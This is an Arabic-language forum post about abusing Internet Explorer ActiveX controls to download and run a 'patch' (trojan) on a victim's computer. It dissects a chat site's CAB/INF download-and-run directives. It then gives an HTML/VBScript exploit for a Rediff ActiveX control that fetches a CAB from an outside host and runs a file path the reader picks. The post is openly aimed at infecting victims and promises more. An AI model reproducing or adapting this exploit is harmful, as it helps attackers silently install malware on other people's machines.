ياهلا وغلا والله بصديقي القديم اخوي FunctionSys منور يلغالي النت كله
وشرح مميز اخوي لـ ActiveX اعتقد الان الكل عرف وضيفة ActiveX من بعد شرح اخوي FunctionSys
والي حاب يعرف عنها اكثر يدخل هذي الصفحه في مايكرو سوفت
https://windowshelp.microsoft.com/Wi...96f051025.mspx
بنسبه للكود الي حطيته اخوي FunctionSys ممكن يحمل ملف بعد تغير الداله لاكن بعد التحميل لجهاز الضحيه مراح يشتغل تلقائي
طبعا هذي صوره لمربع الامان بوجود ملف يحتاج ActiveX لتنزيل
وموقع من ماكيرو سوفت
لما توافق راح يحمل عندك كائن وضيفته التحقق من الملف وتوقع مايكرو سوفت بعدين يشغله
خلونا اول شي نمسح ملفات الانتر نت المؤقته ونمسح الكائنات الخاصه بتوقيع مايكرو سوفت من الجهاز علشان نقدر نحدد السامي الملفات الي راح تنزل واسم الكائن في الجهاز
نمسح الكائنات
نضغط على الزرين الي في الصوره الي مكتوب فيهم حذف
مهم تحط علامة اصح
بعد ماعرفنا وضيفة الاكتف نكمل الحوار حول طرق الاستفاده في ثغرات المتصفح او استخدامه لتنزيل الباتش وتشغيله في جهاز الضحيه
طبعا مايكرو سوفت تستخدمه للضافات على الوندز مثلا لما نروح نحدث الوندز في مايكرو سوفت يطلع لك مربع الامان لما توافق طبعا هذا المربع يطلع لتحميل من مايكرو سوفت او المواقع الي تابعه لها او المعتمده لدى مايكرو سوفت بتوقع من مايكرو سوفت
طبعا الكثير يعلم ان اول ماتدخل الشات لول مره راح يطلع لك مربع الامان بوجود ملفات يجب تحميلها قبل دخول الشات
ندخل على اي شات او هذا الشات
http://209.11.244.10/hwazn/
بيطلع لك مربع الامآن نضغط نعم
وننتظر شوي لحد ماتطلع لك اسامي الغرف او الرومات علشان تتاكد ان كل شي نزل في الجهاز
الان نشوف وش الملفات الي نزلت طبعا انا مسحت الصور الي نزلت وخليت اهم الملفات
ThawteCodeSigningCA[1].crl
ReadUid[1].CAB
talk[1].cab
الملف الاولى
ThawteCodeSigningCA[1].crl
على حسب ماعرفت ان الملف شهاده امان من مايكرو سوفت وطبعا
Code SigningCA تشغيل كود بعد مايتأكد من توقيع مايكرو سوفت
الملف الثاني
ReadUid[1].CAB
بعد فك الضغط مافهمت شي وممكن مايكون له داعي في استثمار الملف
الملف الثالث
talk[1].cab
وهو اهم ملف
لما فكيت الضغط عنه لقيت
talk.inf
محتوى الملف
كود PHP:
; talk.inf
[version]
; version signature (same for both NT and Win95) do not remove
signature="$CHICAGO$"
AdvancedINF=2.0
[Add.Code]
imcv1.dll=imcv1.dll
msvcrt.dll=msvcrt.dll
mfc42.dll=mfc42.dll
olepro32.dll=olepro32.dll
[imcv1.dll]
file-win32-x86=thiscab
clsid={6924091F-CD97-41E1-B1D4-D9079409D413}
FileVersion=1,1,24,360
RegisterServer=yes
[olepro32.dll]
FileVersion=5,0,4261,0
hook=mfc42installer
[mfc42.dll]
FileVersion=6,0,8168,0
hook=mfc42installer
[msvcrt.dll]
FileVersion=6,0,8168,0
hook=mfc42installer
[mfc42installer]
file-win32-x86=VALUE=http://activex.microsoft.com/controls/vc/mfc42.cab
run=%EXtrACT_DIR%mfc42.exe
; end of INF file
clsid={6924091F-CD97-41E1-B1D4-D9079409D413}
نشوف هذا على مافهمت توقيع مايكيرو سوفت للملف
نشوف في الكود
كود:
file-win32-x86=VALUE=http://activex.microsoft.com/controls/vc/mfc42.cab
وهذا اشبه بأمر اسحب وافك الضغط
لما حملت الملف
كود:
http://activex.microsoft.com/controls/vc/mfc42.cab
لقيت فيه هذا الملف
ولو تلاحظون امر التشغيل
كود:
run=%EXtrACT_DIR%\mfc42.exe
موجود اسفل امر السحب
نشوف السطر الي بعده مكتوب فيه
الان الكل يحتار في كيف الاستفاده من هذا الموضوع او من ارد
خلونا نمسح الكائن الي نزل ونمسح ملفات الانتر نت المؤقته مره ثانيه
ونشوف احد الثغرات الي بتستغل activex
كود PHP:
<html>
<body>
<OBJECT id="rboldwn" WIDTH=1 HEIGHT=1 classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03" codebase="http://imdownloads.rediff.com/newbol/Bol.CAB">
</OBJECT>
<script language="vbscript">
rboldwn.url = "file://C:/WINNT/Notepad.exe"
rboldwn.fontsize = 14
rboldwn.barcolor = EE4E00
rboldwn.start = "start"
</script>
</body>
</html>
نلاحظ
classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03"
اشبه بتوقيع او سريال وعتقد هذا توقيع اللمف الاصلي الي استبدله بمسار ملف غير ملف مايكيرو سوفت
نحط بدل C:/WINNT/Notepad.exe مسار اي ملف في جهازك ونحفظ الكود بصيغة html
ونشغل الصفحه راح يطلع لك مربع الامان وينزل ملفات شبيهه بلملفات الي نزلت لما دخلنا الشات ونشوف وش الفرق بينها وبين الاستغلال وكيف كتب الاستغلال
طبعا الموضوع ماشفت لا منتدى عربي والا اجنبي طرح الفكره مع ان الكثير يعرفها لاكن مخلي الفكره برايفت وشفنا كثير ثغرات استغلو فيها الاكتف اكس في تنزيل الباتش والفكره جات لي من كثرت الثغرات الي استغلو فيها الاكتف اكس في تنزيل الباتش يعني الموضوع حصري على عالم المعرفه وتمنا محد ينقل الفكره الا بذكر حقوق الموضوع
للموضوع بقيه لاكن ننتظر اردود